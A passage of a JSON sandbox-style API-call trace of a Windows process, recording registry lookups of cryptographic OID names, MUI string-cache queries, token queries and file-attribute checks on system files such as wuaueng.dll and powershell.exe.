                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7"
              }
            ],
            "repeated": 0,
            "id": 1594
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1595
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1596
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1597
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1598
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1599
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1600
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1601
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1602
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wuaueng.dll"
              }
            ],
            "repeated": 0,
            "id": 1603
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "\\x426\\x435\\x43d\\x442\\x440 \\x43e\\x431\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400"
              }
            ],
            "repeated": 0,
            "id": 1604
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1605
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1606
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1607
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1608
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1609
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1610
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1611
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000550"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1612
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1613
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wuaueng.dll"
              }
            ],
            "repeated": 0,
            "id": 1614
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "\\x426\\x435\\x43d\\x442\\x440 \\x43e\\x431\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400"
              }
            ],
            "repeated": 0,
            "id": 1615
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1616
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0bbf2b2",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              }
            ],
            "repeated": 0,
            "id": 1617
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe88e",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              }
            ],
            "repeated": 0,
            "id": 1618
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "Index",
                "value": "4"
              },
              {
                "name": "Name",
                "value": "1.3.6.1.4.1.311.80.1!7"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7"
              }
            ],
            "repeated": 0,
            "id": 1619
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe7b1",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000540"
              },
              {
                "name": "SubKey",
                "value": "1.3.6.1.4.1.311.80.1!7"
              },
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7"
              }
            ],
            "repeated": 0,
            "id": 1620
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe9c3",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000544"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "1"
              },
              {
                "name": "MaxValueNameLength",
                "value": "4"
              },
              {
                "name": "MaxValueLength",
                "value": "132"
              }
            ],
            "repeated": 0,
            "id": 1621
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1622
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf1d0",
            "parentcaller": "0x7ffee0bb34e9",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7"
              },
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7"
              }
            ],
            "repeated": 0,
            "id": 1623
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1624
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1625
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1626
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1627
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1628
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1629
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1630
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1631
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
              }
            ],
            "repeated": 0,
            "id": 1632
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x434\\x43e\\x43a\\x443\\x43c\\x435\\x43d\\x442\\x43e\\x432"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
              }
            ],
            "repeated": 0,
            "id": 1633
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1634
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1635
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1636
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
